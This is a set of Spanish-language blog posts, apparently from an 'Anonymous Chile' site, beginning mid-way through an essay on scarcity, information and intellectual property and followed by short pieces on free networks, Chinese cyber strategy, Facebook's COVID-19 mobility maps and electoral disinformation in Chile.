Un denominador común y postulado clave en el pensamiento económico clásico y neoclásico es la omnipresencia de la escasez. Dado que los recursos son limitados en relación a las necesidades y deseos ilimitados de los humanos, éstos actúan como agentes económicos maximizadores. Es por esta razón, nos dicen, que la teoría económica puede hacer predicciones sobre el comportamiento humano. El economista debe postular la escasez para poder ver cualquier cosa en el mundo. La escasez es su condición para la visión y su punto ciego. Para tal ciencia, la existencia de algo no rival se vuelve una anomalía. Este fenómeno ha sido reconocido por los economistas como el problema de los “bienes públicos”. Desde este paradigma, los bienes públicos son causa de fallas en el mercado. Al definir los bienes públicos en estos términos la anomalía no queda resuelta. Sólo reafirma las asunciones iniciales de la ciencia económica. Un ejemplo profundamente relacionado con el argumento presente es la charla sobre el surgimiento de la así llamada “economía de la atención” (Simon, 1971). Se dice que la abundancia de la información ha resultado en una nueva escasez, es decir, la falta de atención entre las audiencias. Por lo tanto, el mercado de la información es superado por un mercado de la atención. La abundancia es definida como una escasez de la escasez. El punto no es que los bienes no rivales abundantes existen en el mundo y que la ciencia económica falla al punto de que es incapaz de reconocerlos. En vez de eso, lo que es importante es que la anomalía es en sí misma producto de la forma particular de observación del economista.

Al ser un artefacto de la forma de observación económica, se sigue que el problema de los bienes no rivales surgieron al mismo tiempo que esta disciplina fue puesta en escena. Para sus padres fundadores, sin embargo, fue la luz, antes que la información, lo que captó su desconcertada atención. Henry Sidgwick observó que “los beneficios de un faro bien ubicado deben ser ampliamente disfrutados por naves sobre las que ningún peaje puede ser convenientemente impuesto” (Sidgwick, 1901, p. 412). John Stuart Mill acordaba que el servicio provisto por los faros era mejor administrado colectivamente como un bien público (Mill, 1965, p. 968). Cien años después, Ronald Coase volvió sobre el debate de los faros y afirmó que todavía suponía un desafío para la teoría económica (Coase, 1974). La conexión entre luz e ideas fue hecha por Thomas Jefferson (Peterson, 1984). Es famosa su conclusión de que ambos deben ser compartidos libremente. Las invenciones no pueden, por su propia naturaleza, estar sujetas a la propiedad privada exclusiva. Todas estas declaraciones convergen en proclamar que la economía política de la información se rige por leyes diferentes de aquellas que se encuentran en la economía política en general. Esta suposición fue más sistemáticamente explorada por el economista Fritz Machlup, que Subrayó las propiedades inusuales de la información:

Si un bien público o social se define como uno que puede ser usado por personas adicionales sin causar un costo adicional, entonces el conocimiento es el más puro de estos bienes.

(Machlup, 1984, p. 159)

Cuando Steward Brand declaró que la información quiere ser libre, estaba metiéndose con una anomalía de la ciencia económica. Las quejas contra la regulación de la propiedad intelectual no podían resolverse volviendo a la ciencia económica contra sí misma. Estableció la fundación de la actual crítica de la propiedad intelectual dominante en sus innumerables variantes. A pesar de la gran cantidad de variantes, el argumento gira alrededor de la discrepancia entre recursos digitales infinitos y recursos tangibles limitados. Se dice que el costo marginal inexistente de la reproducción del conocimiento entra en conflicto con su tratamiento como una propiedad escasa. Es por esta razón que la regulación de la propiedad intelectual es declarada culpable del pecado capital de las ciencias económicas: eficiencia subóptima. Por lo tanto, se la juzga de la misma forma que a cualquier otra industria o sector obsoletos: debe perecer. Esta conclusión es subrayada al volver a conectar de tanto en tanto con la teoría económica. En el caso de Yochai Benkler, la conexión está incluso escrita en el título de su libro principal: La riqueza de las redes (2006). Es una hermosa jugada retórica. En un mundo donde la ciencia económica ha dado forma a gran parte del discurso oficial y la auto-comprensión humana, esta auto-contradicción dentro de la misma cosmovisión se convierte en una poderosa palanca para hacer llegar la crítica contra el status quo. Con la misma seguridad con que los economistas establecen la omnipresencia de la escasez y las inevitables leyes del mercado, los críticos de la propiedad intelectual afirman la naturaleza no rival de los recursos informacionales y su excepción de esas mismas leyes.

La economía política de la información

La maniobra de flanqueo está completa. Habiendo ido tan lejos en este argumento, ha llegado el momento de cerrar el paréntesis en el que inicialmente se colocó la pregunta sobre si la hipótesis de la excepcionalidad de la información es una proposición totalmente falsa. Sin embargo, la excepcionalidad atribuida a la información no es incorrecta per se. La hipótesis es problemática sólo porque lleva nuestra investigación hacia la dirección equivocada al elegir un punto de partida parcial y unilateral. No sirve de nada cuando tratamos de darle sentido a la propiedad intelectual y los comunes informacionales. Si esto parece una corrección menor que a duras penas merece todo el revuelo que armé, entonces respondo que esta diferencia de matices lleva a un enfoque totalmente diferente, tanto analítica como políticamente. Al cuestionar la excepcionalidad atribuida a la información, la orientación de la investigación en su totalidad es puesta en cuestión también, porque la “excepcionalidad” es un artefacto de la forma en que la investigación fue enmarcada. La clave del asunto es la noción de escasez, el alfa y el omega de la disciplina económica, que hace surgir a su Otro radical: la abundancia infinita de recursos informacionales.

El punto inicial de la hipótesis de la excepcionalidad de la información es una afirmación de hecho sobre la existencia positiva de la escasez en el mundo físico, tomada de la disciplina económica. La alternativa es un acercamiento histórica y sociológicamente informado, de acuerdo al cual la escasez (tanto de bienes tangibles como intangibles) siempre-ya está inscrita en las relaciones sociales prevalecientes. Es ahora cuando un análisis robusto de la propiedad intelectual debe comenzar. Esta afirmación podría sonar contraintuitiva. La escasez en el mundo físico es una característica de la vida moderna, experimentada en todos lados como falta y deseo insatisfecho. La certeza sobre tales experiencias debe suspenderse en favor de un punto de vista que relaciona la escasez con el todo social del sistema industrial de mercado. El antropólogo Marshal Sahlins, basándose en sus estudios sobre sociedades arcaicas, hablaba desde este punto de vista privilegiado cuando hizo las siguientes observaciones:

El sistema industrial-mercantil instituye la escasez de una manera sin paralelo precedentes y en un grado sin aproximación en ningún otro lugar. Donde la producción y la distribución están organizadas a través del comportamiento de los precios y todos los medios de vida dependen de obtener y gastar, la insuficiencia del los medios materiales material se convierte en el punto inicial explícito y calculable de toda la actividad económica.

(Sahlins, 1972, p. 4)

Muchos historiadores han demostrado cómo se ha llegado a esta situación, comenzando por el movimiento de cercamiento en los siglos XV y XVI en Inglaterra (Perelman, 2000). La tierra, que hasta ese momento había sido un bien común, fue cercada y asignada a propietarios individuales. La tierra fue convertida en un recurso escaso, tal como la información fue convertida en una entidad abstracta y descontextualizada. La expansión actual de la propiedad intelectual, en las memorables palabras de James Boyle, se convirtió en “un segundo movimiento de cercamiento” (Boyle, 2003). Boyle ejemplifica un análisis que comienza con una crítica más amplia de la propiedad privada y la mercantilización como momentos de un todo social desplegándose históricamente. La perspectiva histórica de la escasez pone el énfasis en la continuidad antes que en la discontinuidad y muestra que la economía política de la información no es tan excepcional después de todo. Nada de lo dicho hasta ahora niega la noción de sentido común de que hay una diferencia cualitativa entre los bienes informacionales y los tangibles. Tampoco niego que pueda resultar significativo reflexionar sobre esta diferencia. Lo que está en juego es solamente cómo enmarcar mejor tal pregunta. Esto fue señalado con vehemencia por Dan Schiller en su crítica de la hipótesis de la excepcionalidad de la información:

En contra de la afirmación posindustrialista de que el valor de la información deriva de sus atributos inherentes en tanto recurso, respondemos que su valor nace solamente de su transformación en una mercancía: un recurso socialmente revalorizado y refinado a través de aplicaciones históricas progresivas del trabajo asalariado y el mercado, hacia su producción e intercambio.

(Schiller, 1988. pp. 41)

Lo que parecen ser características inherentes a la información terminan siendo, en un segundo vistazo, un momento pasajero en un proceso histórico más amplio. Como se ha mencionado anteriormente, la información fue definida a mediados del siglo XX como una entidad abstracta y descontextualizada. Competían otras definiciones de la información en ese momento, pero ésta era la que mejor se alineaba a las necesidades de un complejo científico-industrial en ascenso. Cincuenta años después, la definición de la información de Claude Shannon se ha grabado a fuego en las infraestructuras, prácticas y representaciones de nuestra sociedad. Decir que esta definición de la información es una innovación cultural y una construcción no implica que pueda desaparecer de la noche a la mañana, simplemente haciendo una crítica de ella. La información entendida de esta forma es lo suficientemente real y ha contribuido a una ruptura en la urdimbre de la sociedad, correspondiéndose a grandes rasgos con el esparcimiento de la tecnología de la información. Por ello en consecuencia, esta ruptura debe atribuirse al proceso de trabajo, no a algunas características inherentes atribuidas a la información como tal. En lugar de hablar de “información infinitamente reproducible tratada como un recurso escaso”, sería más apropiado decir “propiedad privada metida a la fuerza en un proceso laboral socializado”. La ventaja principal de esta última descripción es que permite un estilo más dinámico de razonamiento. Una realidad empírica dada puede ser estudiada como una transición en su desarrollo.

Las ventajas del último enfoque se ven claramente cuando el objeto de estudio consiste en el cambio tecnológico y en la destrucción creativa. La convergencia de hardware y software es un caso en cuestión. Esta tendencia se estaba abriendo paso mucho antes que la aparición de las impresoras tridimensionales hogareñas forzara el tema. Un caso son los circuitos programables en campo, ampliamente utilizados en la industria computacional desde hace más de una década. Los circuitos son manufacturados de forma tal que el diseño final puede ser reprogramado más tarde, como si se tratara de código de software. No es necesario decir que le debemos la existencia de los circuitos programables en campo a algo más que a la innata trayectoria del progreso científico y tecnológico. El testimonio de un líder industrial en los ’90, anticipando el incremento en el uso de estos circuitos, ilustra este punto sucintamente:

Nuestra ventaja es que podemos utilizar capacidades de programación fácilmente disponibles para hacer lo que antes requería diseñadores de chips caros y díficiles de reclutar.

(Gibson, 1999, p. 38)

Tanto la definición de información abstracta y matemática estipulada por Claude Shannon, que más tarde respaldó las muchas afirmaciones sobre el ciberespacio como un reino independiente de la existencia física y corpórea, como la última narrativa donde los dos reinos convergen de nuevo, deben localizarse en un circuito más amplio de producción, mercantilización y relaciones de trabajo. Es decir, la propiedad intelectual necesita ser analizada desde el punto de vista más elevado de una crítica de la economía política.

Conclusión

En este artículo he cuestionado la hipótesis de la excepcionalidad de la información, sobre la que descansa la crítica predominante contra la propiedad intelectual. Esta crítica ha sido cortada con la misma tijera que la disciplina económica. La teoría económica neo-clásica, tendencia dominante dentro de la economía, no es una búsqueda académica como cualquier otra. Es materia prima del pensamiento hegemónico y, como tal, una fuerza material que reescribe el mundo de acuerdo a sus propias abstracciones. Para hacer cualquier predicción sobre la economía, la teoría neo-clásica debe postular antes que nada la omnipresencia de la escasez. La escasez es la condición para ver y, consecuentemente, el punto ciego y constitutivo de este “paradigma científico”. Es esta la anomalía que los críticos del régimen de propiedad intelectual explotan cuando hablan sobre la excepcionalidad de los bienes informacionales no rivales. La ironía de este giro es fácilmente apreciable. La justificación para la existencia de la propiedad intelectual es derrocada desde adentro de la fortaleza misma de la propiedad. La liturgia del libre mercado está siendo cantada en alabanza a los comunes informacionales. El precio a pagar es, sin embargo, que el punto ciego de la disciplina económica sea debidamente reproducido en la crítica de la propiedad intelectual. Esto es evidente en las obras de Lawrence Lessig y Yochai Benkler, así como en el pensamiento de muchos hackers y hobbistas. No es suficiente criticar las fallas intelectuales de esta narrativa sin reconocer también cómo quienes la practican la hacen funcionar para ellos mismos cuando hacen trabajo-frontera. Un buen ejemplo es la distinción entre “libre expresión” y “cerveza libre”. Cuando los militantes del Software Libre insisten en esta frontera, se presentan a sí mismos como militantes estrictos de problemáticas de derechos civiles, mientras eximen de criticar la propiedad, los mercados y la distribución de la riqueza a su oposición abiertamente declarada a los derechos de propiedad intelectual.

El trabajo-frontera en el que hackers, activistas y académicos se han involucrado desde los ’80 está siendo desestabilizado por la introducción de un nuevo elemento narrativo. A saber, la exclamación de que, para ponerlo en el argot de la ideología californiana: “los átomos son los nuevos bits”. En el corazón de la articulación de este nuevo imaginario están los hobbistas construyendo impresoras tridimensionales de código abierto. La máquina fue ideada con el objetivo explícito de derrumbar la barrera que separa la información de los bienes físicos. La expectativa entre muchos de los hobbistas es que se desencadenen, sobre la manufactura industrial, las mismas fuerzas disruptivas que ya tienen sitiadas a las industrias de la música y el cine. El compartir archivos va a ser generalizado a toda la economía. Dicho en términos más abstractos, los hobbistas rinden tributo a la revelación de que la línea entre los comunes informacionales y los mercados de objetos físicos no está dada de una vez y para siempre. La línea no está inscrita en la naturaleza de los recursos, como la posición naturalista establecería. Como esta línea ha sido construida, está sujeta a ser reconstruida y renegociada. Pero hay que notar que la articulación de una nueva narrativa alrededor de los átomos y los bits juega un rol menor en este proceso de renegociación. Cuenta más la habilidad y la dedicación de los hobbistas para trabajar en y dirigir el proceso de desarrollo de las impresoras 3D. Desde el punto de vista privilegiado de los hobbistas, esto es percibido como una movida ofensiva. Están abriendo un nuevo frente en la lucha contra la propiedad intelectual.

Desafortunadamente, el mismo dezplazamiento desde una comprensión naturalista de la propiedad privada hacia una constructivista ya ha sido realizado por los sectores más avanzadas de los “derechos adquiridos”. La comprensión naturalista o fundacionista de la propiedad privada no sólo legitima la propiedad al retratarla como un estado natural eterno, una crítica muy conocida por la izquierda desde que Karl Marx denunciara el fetichismo de la mercancía. Del mismo modo, todo lo que no es propiedad se retrata como igualmente perteneciente a un estado natural, ya sea luz o ideas. Esto establece un piso o base más allá del cual la propiedad no puede ser concebida. No hay que sorprenderse, entonces, de que las falacias naturalistas del liberalismo clásico y la economía política clásica hayan sido descartadas por el Colectivo de Pensamiento Neo-Liberal (Mirowski, 2013). Lo mismo puede verse en un texto publicado por el Cato Institute, uno de los muchos think tanks que conforman la vanguardia neo-liberal. El libro discute la relación entre propiedad, mercados y tecnología. En una re-examinación del viejo debate sobre los faros y los bienes públicos, mencionado más arriba, un economista hace notar que la luz ha sido reemplazada, como medio para asistir la navegación, por las señales de radio. Esta tecnología está diseñada de tal forma que la renta por el servicio puede ser extraída fácilmente. El escritor se regocija: gracias al cambio tecnológico, ya no hay tales cosas como los bienes públicos naturales. Es solo la inercia institucional la que retrasa la implacable expansión e intensificación de los mercados (Foldvary, 2003). Ese último comentario clarifica por qué el Colectivo de Pensamiento Neo-Liberal, aunque su agenda oficial sea “aplastar el Estado”, antes que nada está preocupado en capturar al Estado. Es a través del poder estatal que la inercia institucional contra la expansión de los mercados puede ser aplastada (Mirowski, 2013). El ejemplo más usado, discutido extensamente en otros lados, es la privatización de los servicios públicos. Sin embargo, la proyección de la propiedad intelectual sobre los objetos físicos puede añadirse a la lista. Esto apunta a un futuro donde los aspectos más controversiales de la propiedad intelectual, es decir, los sistemas de gestión de derechos digitales, la vigilancia de los clientes en tiempo real y los intrincados sistemas de diferenciación de precios han pasado sobre la anterior barrera entre lo virtual y lo físico. En otras palabras, la proyección ha transformado la propiedad privada tal como la conocemos. Los dos tipos de propiedad convergen en lo que he dado en llamar “propiedad aumentada”. La defensa de que esta proyección es lógicamente imposible, dejaría muchas lagunas y no aplica correctamente a los objetos realmente existentes, es de poca importancia. El triángulo de Penrose no puede existir en términos lógicos, pero la ilusión de uno es suficiente para los propósitos de leyes y mercados. La propiedad aumentada implica que la granularidad de las mercancías puede hacerse infinitamente pequeña. Son infinitas las formas de diseccionar la información y proveerla en según el pago. La tosca manera en que los bienes y servicios son cobrados hoy, dentro de algunos años se verá como una larga e interminable lista de fracasos del mercado. La tecnología mantiene su promesa de cerrar las fallas del mercado, una y otra vez. Parafraseando el meme anti-fundacionalista y constructivista, los mercados van “hasta el fondo”. Como antes sucediera con el régimen de la propiedad privada, este nuevo orden solo puede continuar existiendo si las transgresiones en su contra son sancionadas por el Estado. Mientras se despliega el conflicto sobre la propiedad aumentada, la piratería se generalizará en cada rincón de la sociedad. Y en todos lados escucharemos el grito de guerra: ¡los átomos también quieren ser libres!

Definición y concepto de una red libre

Publicada el 24/04/2020 - 02/08/2021 por Anonymous Chile

La dialéctica fundamental de nuestra lucha es esta: ¿seremos esclavizados por nuestra tecnología, o liberados por ella?

Fue al reconocer esta noción, y al servicio de nuestra libertad colectiva, que nació el Movimiento del Software Libre. Es en este espíritu en el que tratamos de definir exactamente lo que queremos decir cuando decimos que una red es libre. Esperamos que la existencia de esta definición ayude a iluminar el camino hacia un mundo más justo.

Nuestra intención es construir sistemas de comunicaciones que sean poseídos por la gente que los usa, que permitan a los participantes poseer sus propios datos y que usen encriptación de punta a punta y mecanismos de confianza criptográficos que garanticen su privacidad. Llamamos a tales sistemas ‘redes libres’ y estos están caracterizados por las siguientes cinco libertades:

Libertad 0: La libertad de participar en la red

La libertad 0 trata sobre tu derecho a organizar redes cooperativas.

Las redes convencionales se caracterizan por la distinción entre usuario y proveedor. Este modo de organización promueve la operación de la red al servicio del interés propio. El proveedor construye y posee la infraestructura y el usuario paga por el acceso. En una red libre, sin embargo, los nodos se conectan entre sí, en vez de a un único proveedor monolítico. Por la naturaleza de su diseño, una red libre es poseída por aquellos que le dan uso. Los participantes actúan como proveedores y usuarios al mismo tiempo, y el crecimiento se auto-distribuye al tratar cualquier ganancia como inversión. De esta forma, aquellos que se unen a la red son capaces de volverse sus propietarios. Este modo de organización promueve la operación de la red al servicio del bien común.

Libertad 1: La libertad de determinar dónde son almacenados los propios bits

La libertad 1 trata sobre tu derecho a poseer el almacén material de tus datos.

Las redes convencionales promueven (si no fuerzan) que sus participantes almacenen sus datos en máquinas que están bajo los auspicios administrativos de un alojamiento o proveedor de servicio externo. La mayoría de la gente no es capaz de servir datos desde sus casas. Los participantes deben ser libres de almacenar sus propios datos (así están bajo su cuidado) sin sacrificar su capacidad de publicarlos.

Libertad 2: La libertad para determinar con quiénes son compartidos los propios bits

La libertad 2 trata sobre tu derecho a controlar el acceso a tus datos.

La minería de datos y la monetización del compartir se han vuelto prácticas comunes. Los participantes deberían ser libres de elegir a aquellos con quienes les gustaría compartir una información determinada. Sólo alquien que posee sus propios datos puede ejercitar completamente esta libertad, pero esto es un problema sin importar dónde estén guardados los bits relevantes.

Libertad 3: La libertad para transmitir bits a tus pares sin el prospecto de interferencia, intercepción o censura

La libertad 3 trata sobre el derecho de hablar libremente con tus pares.

Los flujos de información en las redes convencionales son rutinaria e intencionalmente interceptadas, obstruídas y censuradas. Esto se hace a favor de actores corporativos y estatales alrededor del mundo. En una red libre, las comunicaciones privadas deberían permanecer sin examinar desde el momento en que entran a la red hasta el momento en que llegan a su destino.

Libertad 4: La libertad de mantener el anonimato, o de presentar una identidad única y confiable

La libertad 4 trata sobre tu derecho a construir tu propia identidad.

Existe una presión en aumento para proscribir el anonimato, y sin embargo las comunicaciones confiables permanecen escasas. Mientras que es esencial para la libertad que los individuos puedan mantenerse anónimos en la esfera pública online, también es esencial que sean capaces de construir y mantener identidades persistentes y verificables. Tales identidades pueden ser un nombre legal, uno en común o un avatar que enmascare el ser corpóreo – los individuos pueden tener muchas identidades tales, y cambiar entre ellas a voluntad. Un claro delineamiento entre actores anónimos, pseudónimos y ónimos nos permitiría a todos evaluar mejor la confiabilidad de otros en la red.

China: De la cultura al conflicto en el ciberespacio

Publicada el 23/04/2020 - 02/08/2021 por Anonymous Chile

Desde que en 2013 la consultora de ciberseguridad estadounidense Mandiant publicara su famoso report sobre APT1 evidenciando sus vínculos con diferentes agencias asociadas al gobierno chino, las noticias sobre sus actuaciones en el ciberespacio no ha hecho más que incrementarse.

Entre otros, nos encontramos con APT15, APT27 o Winnti Group (APT41); las acusaciones de ciberespionaje del DoJ estadounidense hacia cinco militares chinos asociados al grupo APT1; las vinculaciones que el FBI ha establecido entre Zhu Hua y Zhang Shilong y APT10; o el presunto vínculo de la unidad 61398 del PLA (People’s Liberations Army) con APT1.

Con el permiso de Rusia y su popular operación contra el DNC, China se ha convertido en el principal actor en el ciberespacio, desarrollando un incontable número de operaciones contra todo tipo de sectores: grandes tecnológicas, industrias militares o navales, y diferentes organizaciones gubernamentales. A veces utilizando malware más sofisticado, y a veces menos, pero cada vez más con un sello propio ligado a su extensa tradición.

Según los textos antiguos tradicionales, la civilización china se remonta a más de 4000 años con la primera dinastía Xia. Debido a la continuidad y fortaleza de su estructura política y social, la protección de su legado histórico y cultural y la prácticamente nula influencia occidental hasta el siglo XIX, el Imperio chino es considerado el imperio más antiguo que existe.

La perdurabilidad histórica del imperio chino no se ha basado únicamente en las victorias militares, sino en su peculiar manera de entender la resistencia ante la invasión extranjera. Como ejemplo, la Dinastía Qing, última dinastía china que gobernó entre el 1644 y el 1912, fue fundada por el clan Aisin-Gioro de Manchuria (los manchúes son en la actualidad una minoría étnica) y no por población china tal y como se podría pensar. Del mismo modo, la dinastía Yuan (1279-1368) fue fundada por invasores mongoles, herederos del legado de Gengis Khan.

A pesar de ello, la lengua, costumbres y tradición continuaron inalteradas gracias a las élites burocráticas chinas, quienes ofrecían sus servicios a los invasores con la excusa de la dificultad que les supondría controlar un país con semejantes dimensiones, y poniendo como única condición mantener sus métodos y lengua. A causa de esto, los invasores de segunda generación asimilarían la cultura, llegando a ser vistos como forasteros por sus territorios de origen, y finalmente, acabar defendiendo los intereses nacionales de China.

La resistencia y adaptabilidad propias del carácter chino hacia el invasor sigue estando presente, y hemos asistido a la transformación de una sociedad que en 1984 era fundamentalmente agrícola (40% de su PIB), y que apenas 35 años después domina el escenario tecnológico mundial junto a Estados Unidos, liderando el despliegue de 5G de la mano de Huawei. Tal logro se ha producido no solo en términos de competitividad, sino consiguiendo que su tecnología forme parte intrínseca de su legado y poniendo el desarrollo tecnológico al servicio del interés nacional.

Y es que, tal y como lo compara el exjefe del Servicio Canadiense de Inteligencia y Seguridad para Asia-Pacífico, Michel Juneau-Katsua, si la inteligencia occidental tuviera que robar una playa, iría de noche y esperaría a que nadie le pudiera ver para robarla. En cambio, si lo tuviera que hacer la inteligencia china, mandaría a un millar de turistas y a la vuelta les haría sacudir sus toallas. Y así día tras día.

La ocultación a plena luz del día es un concepto asociado a la cultura oriental, pues, incluso dejando a un lado a las grandes corporaciones como Xiaomi o Huawei y la obvia posibilidad de control de «sus» dispositivos, han conseguido instalar software de todo tipo en cualquier ordenador del planeta. No es extraño encontrar binarios con recursos para lenguaje mandarín o drivers firmados por empresas chinas, que potencialmente podrían facilitar una campaña dirigida contra cualquier organización.

Tenemos también la cuestión de los dispositivos electrónicos, cuya venta masiva ha permitido el despliegue mundial de una red de cámaras de videovigilancia, altavoces o smartbands potencialmente vulnerables. Mientras, en paralelo, compite con Google y Amazon por el control de la información en el hogar.

Sin embargo, a China no le interesa entrar en la trampa de Tucídides mediante un enfrentamiento directo contra Estados Unidos, sino que utilizará, como ha hecho antaño, el escenario geopolítico multipolar para conseguir sus propósitos.

Si utilizas al enemigo para derrotar al enemigo, serás poderoso en cualquier lugar a donde vayas.

A punto de finalizar la guerra de Corea, Mao logró hacerse hueco en la escena internacional mediante una estrategia muy en la línea del clásico estratega Sun Tzu. En un mundo en el que dos grandes superpotencias, EEUU y la Unión Soviética, luchaban por la hegemonía mundial, consiguió mirarles de igual a igual.

Se enfrentó a Estados Unidos en el conflicto del estrecho de Taiwan y, casi al mismo tiempo, se desvinculó ideológica y geopolíticamente del bloque comunista. Esta postura estaba fundamentada en que ninguna de las potencias permitiría el lanzamiento de armamento nuclear sobre territorio mandarín, y el mantenimiento de una postura pública que afirmaba no tener ningún miedo a dichas armas. Como el mismo Mao afirmó, “China posee 600 millones de habitantes en un área de 9’6 millones de kilómetros cuadrados. Los Estados Unidos no pueden aniquilar China con un simple montón de bombas atómicas”.

Ejerciendo una posición activa, Mao acabó formando parte del equilibrio internacional con una voz independiente, ejerciéndo presión psicológica a ambos bandos a través de los conflictos en el estrecho de Taiwan y su intervención en la guerra de Vietnam.

El mundo actual ofrece muy buenas oportunidades para estas actuaciones de titiritero, dado que la atribución de un acto hostil en el ciberespacio es algo verdaderamente complejo, como pone de manifiesto la operación de falsa bandera reportada por Kaspersky sobre OlympicDestroyer. Durante los Juegos Olímpicos de invierno de Corea del Sur de 2018, el malware OlympicDestroyer paralizó sistemas de TI, provocó apagones y tiró abajo sitios web de la organización.

Lo relevante de estas actuaciones es que, tal y como se detalla en el informe, las tácticas, técnicas y procedimientos (TTP) eran los comúnmente utilizados por el grupo Lazarous, asociado a Corea del Norte. Sin embargo, todo apuntaba a que se habían cometido errores intencionados de cara a facilitar la detección de tales TTP, agitando el escenario internacional con una campaña con tintes mediáticos. Esto cobra mayor sentido si tenemos en cuenta que en febrero de 2018 Corea del Norte se encontraba cercada por las sanciones derivadas de su plan nuclear, en concreto las resoluciones 2371, 2375 y 2397 adoptadas en 2017, lo que perjudicó fundamentalmente su relación con China.

Mirando al futuro, todo apunta a que China seguirá apostando por la resolución de conflictos mediante operaciones en el ciberespacio, limitando sus intervenciones militares a lo estrictamente necesario o con fines propagandísticos.

El conflicto en el ciberespacio permite, en cierta medida, abandonar las tesis de Clausewitz y el entendimiento del enfrentamiento como batallas que comienzan y terminan, y donde los enemigos son unidades definidas y tangibles. La nueva era abraza tesis suntzunianas, fomentando la flexibilidad en la batalla o la utilización del tiempo como arma, conceptos más bien ajenos a la tradición occidental.

Mientras que la tradición en Occidente ha fomentado el heroísmo y el golpe maestro en el momento decisivo, los ideales chinos se basan en la paciencia, el daño sutil y la acumulación de ventajas de manera paulatina, conceptos que vienen como anillo al dedo en el conflicto en Internet.

Así pues, China se encuentra cómoda con el nuevo planteamiento del conflicto multinacional, un mundo cuyas reglas juegan a favor de la ocultación, la indefinición y la confusión.

Es decir, sus reglas.

¿Espionaje o medidas anticorona? Facebook rastrea a sus usuarios para evitar contagios

Publicada el 23/04/2020 - 02/08/2021 por Anonymous Chile

Facebook ha comenzado a ampliar su iniciativa Data for Good, la cual brinda a investigadores acceso a datos sobre patrones de movimiento, centrándose en los datos que puedan ayudar a comprender si las medidas tomadas para combatir la pandemia de enfermedad por coronavirus están funcionando.

Hasta ahora, la compañía dirigida por Mark Zuckerberg había estado compartiendo con la comunidad científica mapas sobre el movimiento poblacional que investigadores y organizaciones sin ánimo de lucro están utilizando para comprender mejor cómo se está desarrollando esta crisis sanitaria.

Los mapas creados por Facebook pretenden revelar si las personas siguen las instrucciones de las autoridades y avanzar cómo podría moverse el coronavirus por los países y el mundo.

La novedad, han informado desde Facebook, es que ahora van a ofrecerles tres nuevos tipos de mapas elaborados a partir de los datos de localización de sus usuarios. Datos agregados, recalcan, «para proteger la privacidad de las personas».

Mapas de prevención de enfermedades

Los patrones de ubicación conjunta, como estos de Italia, pueden ayudar a los modeladores de enfermedades a determinar cómo podría propagarse la COVID-19.

Los mapas de prevención de enfermedades que Facebook elabora son conjuntos agregados de información que los investigadores de salud pueden usar, explican desde la compañía, «para comprender mejor cómo la dinámica de la población influye en la propagación de la enfermedad».

Mapas que, como en el caso del plano de Italia que precede estas líneas, revelan la probabilidad de que los habitantes de una zona entren en contacto con personas de otra. Esta información, cruzada con otro tipo de datos, podría ayudar a identificar en qué lugares pueden aparecer con mayor probabilidad nuevos casos de COVID-19 en cuanto las restricciones de movimientos se levanten, por ejemplo.

Los mapas pueden ayudar a identificar en qué lugares pueden aparecer con mayor probabilidad nuevos casos de COVID-19 en cuanto las restricciones de movimientos se levanten.

Las tendencias de rango de movimiento, como estas para Brasil, muestran si personas en diferentes regiones están visitando muchas áreas.

Otro de los mapas que Facebook está compartiendo con la comunidad científica son los que revelan las tendencias del rango de movimiento. En esencia, muestran a nivel regional si las personas de ese lugar suelen quedarse cerca de su domicilio o, por el contrario, suelen moverse más allá de su entorno.

Esta información, acotada en el tiempo en periodos de confinamiento obligatorio, por ejemplo, podría mostrar si las normas se están cumpliendo de forma efectiva.

El índice de conectividad social, uno de los mapas creados por Facebook, «puede ayudar a los epidemiólogos a pronosticar la probabilidad de propagación de la enfermedad».

Por último, Facebook ha creado un tercer tipo de mapa que muestra lo que han llamado el índice de conectividad social. Estos mapas muestran a partir de los datos de la plataforma las amistades de personas en otras regiones y países. Eso, dicen desde la compañía, «puede ayudar a los epidemiólogos a pronosticar la probabilidad de propagación de la enfermedad».

La tecnológica estadounidense, con un amplio historial de polémicas en torno a la privacidad, asegura que además de emplear únicamente datos agregados y, por tanto, anónimos, ha tomado medidas adicionales para que la ocultación de la identidad de las personas sea mayor, reduciendo así el riesgo de identificaciones.

Propaganda electoral digital: perfilamiento y noticias falsas

Publicada el 22/04/2020 - 02/08/2021 por Anonymous Chile

El fenómeno de las “noticias falsas” y el perfilamiento de información han sido abordados en distintos contextos electorales. Recientemente en Chile, a propósito del plebiscito constitucional, el Servicio Electoral (Servel) y Facebook entablaron conversaciones en torno a un convenio de colaboración para los procesos electorales cuyos alcances aún se desconocen.

A fines de febrero, Marcos Tourinho, gerente de Políticas Públicas y Elecciones de Facebook, visitó Chile para reunirse con el personal del Servicio Electoral (Servel) e informar de las medidas que estaba tomando la compañía para evitar el uso pernicioso de la plataforma de cara al plebiscito que se realizará el próximo 26 de abril.

La visita fue ampliamente cubierta por la prensa, aunque a veces de forma contradictoria y confusa. Existen diversas versiones respecto al acuerdo que habrían firmado Facebook y el Servel, y el objetivo de este, así como también sobre el carácter de las herramientas de las que la compañía dispone para asegurar el buen desempeño del proceso eleccionario. Lo cierto es que Facebook y el Servicio Electoral han estado en conversaciones desde hace ya algunos meses con el objetivo de generar un convenio de colaboración “cuyos alcances serían informados oportunamente” como consigna el sitio web de Servel.

Mientras que distintos medios, como Cooperativa y Meganoticias, centraron su atención respecto al fenómeno de las “noticas falsas”, tópico que se ha vuelto recurrente a partir de su supuesto uso e influencia en la última elección presidencial estadounidense, lo cierto es que el conjunto de herramientas presentadas por Facebook son aquellas que funcionan permanentemente en la plataforma y que tienen por objeto preservar la “calidad” del contenido en línea. Ellas consisten en una serie de algoritmos asistidos por humanos, que tienen el objetivo de detectar cuentas falsas (aquellas donde se sospecha que no existe equivalencia entre la identidad declarada con la de la persona fuera de Facebook) y contenidos que trasgredan las normativas de la plataforma. Pero este es un trabajo que responde directamente a las normas que Facebook ha establecido para el uso del servicio y no a un esfuerzo focalizado que se esté realizando de manera especial en el país a propósito del próximo plebiscito. La razón es sencilla: Facebook ha dispuesto que cualquier acto de fiscalización de ilegalidades en su plataforma debe emanar de la autoridad competente; de ahí la relevancia del acuerdo con Servel. Y, sin embargo, incluso con la alianza formalizada, ello no implica necesariamente una intervención más férrea sobre las “noticias falsas”, pues estas no son por si mismas ilegales y pueden estar protegidas por el derecho a la libertad de expresión.

